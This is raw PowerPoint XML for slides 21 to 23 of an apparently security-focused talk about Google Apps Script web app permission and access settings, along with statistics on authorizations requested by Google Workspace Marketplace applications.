                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1585FBEF-A0CE-04DC-AF13-DEBF1A3D85D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8641080" y="4897279"/>
            <a:ext cx="502061" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0"/>
              <a:t>21/47</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Image 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08D0959D-5571-8E43-E8CE-1FC2C24942F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1950" t="71266"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3545379" y="3245597"/>
            <a:ext cx="209155" cy="215752"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Image 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B7D3601-30FF-8A85-726D-CD89C7FE21B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1950" t="71266"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3545378" y="3933910"/>
            <a:ext cx="209155" cy="215752"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Image 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{013AB511-D5E9-BE3C-0BAF-A00C21E822B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1950" t="71266"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3587152" y="4574981"/>
            <a:ext cx="209155" cy="215752"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Image 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7C0EB55-4D0B-8583-F57A-8BB3334647E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1950" t="71266"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4619969" y="3239624"/>
            <a:ext cx="209155" cy="215752"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Image 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D63DFF9-5B95-AE15-2257-9B316CB38B0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1950" t="71266"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6295757" y="3239624"/>
            <a:ext cx="209155" cy="215752"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Image 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74A41648-360F-1CE7-7FB2-FCEBCAF5146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2966" r="71950"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4631940" y="4585286"/>
            <a:ext cx="222312" cy="215752"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="Image 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2E073FE-2314-F34F-A61B-5BF209E8209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2966" r="71950"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4613390" y="3933910"/>
            <a:ext cx="222312" cy="215752"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Image 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CC04CC5-974A-152B-4020-BD222751701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2966" r="71950"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6301013" y="3933910"/>
            <a:ext cx="222312" cy="215752"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="Image 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9503413-44AF-16E1-1C98-94484F11D8F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2966" r="71950"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6301013" y="4585286"/>
            <a:ext cx="222312" cy="215752"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="Image 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E352882-BD9F-6698-A2A6-0227947510C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2966" r="71950"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7677235" y="4585286"/>
            <a:ext cx="222312" cy="215752"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30" name="Image 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F739BC98-B977-E840-FDB9-6B121F95E1A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2966" r="71950"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7677235" y="3933910"/>
            <a:ext cx="222312" cy="215752"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31" name="Image 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29AAF027-B125-AFFD-F325-07643F15AC3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2966" r="71950"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7677235" y="3239624"/>
            <a:ext cx="222312" cy="215752"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1622736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Permissions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Image 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAB3EB6A-B312-84B5-C660-132642034964}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4200804" y="1193006"/>
            <a:ext cx="4379556" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA978550-11A5-7077-8FA6-CC39E6FB9C66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5469038" y="2786062"/>
            <a:ext cx="921544" cy="121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9BD1DB5D-D678-EC69-A32C-715C5218D69E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="563639" y="1129607"/>
            <a:ext cx="3316597" cy="1836230"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Permission configuration:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0"/>
              <a:t>Execute the app as me: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>In this case, the script always executes as the owner of the script, no matter who accesses the web app</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0"/>
              <a:t>Execute the app as user accessing the web app: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>In this case, the script runs under the identity of the active user using the web app</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0">
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="ZoneTexte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDB0D8E3-DA5E-2B40-42D5-BEE10C301544}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8641080" y="4897279"/>
            <a:ext cx="502061" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0"/>
              <a:t>22/47</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="632743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Application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>access</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96ABA950-DDFE-7700-80F4-EB26956FB933}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4452753" y="1193358"/>
            <a:ext cx="4300828" cy="3371850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7B8D741-0BB4-BD31-04D8-ED9D24F42FAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5560180" y="3279332"/>
            <a:ext cx="921544" cy="1214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ous-titre 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0516E7F4-69B0-8934-E773-A6596B8B1989}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="563640" y="1129607"/>
            <a:ext cx="3578990" cy="3542406"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Who can access the application:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0"/>
              <a:t>Only me: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>the application creator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0"/>
              <a:t>Anyone with Google account:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t> any user authenticated with Google</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0">
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="ZoneTexte 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B82CCE88-CAF5-ED54-E20B-9DAE5FCFFAED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8641080" y="4897279"/>
            <a:ext cx="502061" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0"/>
              <a:t>23/47</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3812225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7587626"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Google Workspace </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>MarketPlace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>statistics</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Sous-titre 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0516E7F4-69B0-8934-E773-A6596B8B1989}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="563640" y="1129607"/>
            <a:ext cx="8488920" cy="3542406"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>We have developed a script to analyze the authorizations requested for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>MarketPlace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> applications:</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0">
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="ZoneTexte 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B82CCE88-CAF5-ED54-E20B-9DAE5FCFFAED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8641080" y="4897279"/>
            <a:ext cx="502061" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0"/>
              <a:t>23/47</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Image 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{224B09AB-2305-3AF0-4C88-26BC2B707192}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1383256" y="1885935"/>
            <a:ext cx="6849688" cy="1870394"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="798320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7587626"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Google Workspace </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>MarketPlace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>statistics</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Sous-titre 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0516E7F4-69B0-8934-E773-A6596B8B1989}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="563640" y="1129607"/>
            <a:ext cx="8488920" cy="3542406"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>2027 applications available in November 2023</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Here are the authorizations most frequently used by applications:</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0">
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="ZoneTexte 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B82CCE88-CAF5-ED54-E20B-9DAE5FCFFAED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8641080" y="4897279"/>
            <a:ext cx="502061" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0"/>
              <a:t>23/47</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Image 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECEB0891-6DA4-21CF-48DD-4C991077E31F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1217002" y="2089964"/>
            <a:ext cx="7182196" cy="2127354"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
